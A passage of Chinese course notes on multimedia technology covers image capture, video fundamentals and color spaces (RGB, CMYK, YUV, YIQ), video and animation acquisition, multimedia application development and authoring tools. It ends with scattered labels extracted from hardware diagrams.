数码相机拍摄,可以将自然景色转换为数字化图像;
从数字化仪中输入,主要用于企业;
从屏幕,动画,视频中捕捉;
从素材光盘中选取或从网络下载.
(2)屏幕截图
是一种较常见且操作简单的图像捕捉方法,有静态屏幕采集:得到是静态图像;动态屏幕采集:可以将屏幕图像及使用者的操作记录下来,得到的是动画文件.
Print Screen 截取整个屏幕图像到剪贴板
Alt+Print Screen 截取当前窗口
基本步骤:P209
(1)屏幕截图
(2)利用"画图"程序截取纯文本文件图标
(3)将截取的纯文本文件图标添加到Word文档中
四,多媒体动画和视频素材的采集与制作
1.视频基础知识
视频是由一幅幅静态画面序列(帧frame)组成 ,这些画面以一定的速率(fps)连续地投射在屏幕上,使观察者具有图像连续运动的感觉
视觉暂留效应:一幅图像在人的眼里会停留一段时间后才消失,利用视觉暂留效应,控制静态图像按一定速率连续播放就能产生运动的感觉.
图像播放的速度应控制在25fps到30fps
视频标准主要有NTSC制和PAL制两种.
2.视频的彩色空间表示
(1)在多媒体计算机中,常常涉及到几种不同的色彩空间表示颜色.如计算机显示时采用RGB彩色空间;彩色印刷时采用CMYK彩色空间;彩色全电视信号数字化时采用YUV彩色空间;为了便于色彩处理和识别,视觉系统又经常采用HSI彩色空间.
RGB 彩色空间又称加色法系统, R,G,B表示红,绿,蓝三种基色.通过三个分量的不同比例配合,在显示屏幕上合成所需要的任意颜色
CMYK彩色空间又称减色法系统.C,M,Y,K表示青色,品红,黄色和黑色.C,M,Y三种颜色混合在一起时应呈黑色.在现实中,把等量的靛蓝,品红,黄色油墨混合在一起产生不是黑色而是深棕色.因此又加入一些黑墨以打印真正的黑色.
(2)彩色电视信号使用YUV和YIQ彩色空间
YUV彩色空间 是PLA制式采用的,其中Y表示亮度,
U,V表示色差,U,V是构成彩色的两个分量.
多媒体计算机中采用了YUV彩色空间,数字化后通常
为Y:U:V = 8:4:4或者是Y:U:V = 8:2:2
YIQ彩色空间是NTSC制式采用的,Y仍为亮度信号,
I,Q仍为色差信号,但它们与U,V是不同的,其区别是
色度矢量图中的位置不同.
I,Q与V,U之间的关系可以表示成:
I=Vcos33o–Usin33o
Q=Vsin33o+Ucos33o
RGB,CMYK,YUV彩色空间是可以相互转换的,在不同的场合使用不同的彩色空间.
3. 数字视频的获取途径
数字视频的获取主要的方法有:
(1)利用摄像机和视频采集卡录制;
(2)使用专门的视频制作软件制作,常用的视频处理软件有Windows Movie Make,MediaStudio,Premiere等;
(3)从VCD中截取,或用屏幕截取软件录制;
(4)从素材光盘中选取或从网络下载.
最主要的途径是利用视频采集卡采集,录制及播放过程如图:
4.动画的获取途径
动画是借助于计算机生成一系列连续图像的计算机技术,现在的动画素材一般通过软件制作,常用的有Animator(二维动画)和3DS Max(三维动画).此外,还有一些专门用于某种特技动画的工具:Cool 3D 专门制作文字动画;Photomorph 专门制作物体变形的动画软件;Ulead Gif Animator 专门用来连接静态图片成为动画的软件;Flash,Fireworks 用于制作网页动画.
4.4 多媒体应用系统的设计与创作
一,多媒体应用系统开发过程
1.借鉴软件工程开发方法,多媒体应用系统开发需要经过需求分析,结构设计,编程实现,测试和维护几个阶段.
2.多媒体项目开发的组成人员包括:
(1)项目经理
(2)主题专家
(3)美术音乐创意人员
(4)交互媒体创作人员
(5)媒体制作人员
(6)软件人员
3.多媒体应用系统开发流程
二,多媒体创作工具
多媒体创作工具指的是将多媒体素材集成为一个多媒体应用系统的工具,是一种高级的软件程序或开发平台,支持各种各样的硬件设备和文件格式,能够将文字,图像,音频,视频,动画等视听对象组合在一起,形成一个结构完整的多媒体应用系统.
典型的多媒体创作工具主要有:
PowerPoint 主要用来创建演示文稿,屏幕电子演示套件等;
Authorware 基于图标和流程图的可视化创作工具;
Director 基于时间的多媒体创作工具;
Visual BASIC 基于传统程序设计语言的多媒体创作工具.

模拟信号输入
模/数转换
采样/量化编码
传输/存储
数/模数转换
模拟信号输入
LINE IN
扫描仪,数码相机等外设
收录机
扬声器
麦克风
录像机
影碟机
摄像机
声卡
光盘存储器
视频卡
显示器
主机
MIC IN
电子乐器等MIDI设备
立体声放大器
扬声器
话筒
录音机,CD唱机等
MIDI
SPK OUT
LINE OUT
电子乐器
基线
计算机主机
视频采集控制器
输出显示
D/A转换
A/D转换
视频信号
帧存储器
多通道输入
周期
振幅
B
G
R
V
U
Y
V
U
Y
V
U
Y
B
G
R
B
G
R
视频窗口控制器
摄
像
机
模/数
交换
模/数
交换
模/数
交换
模/数
交换
模/数
交换
摄
像
机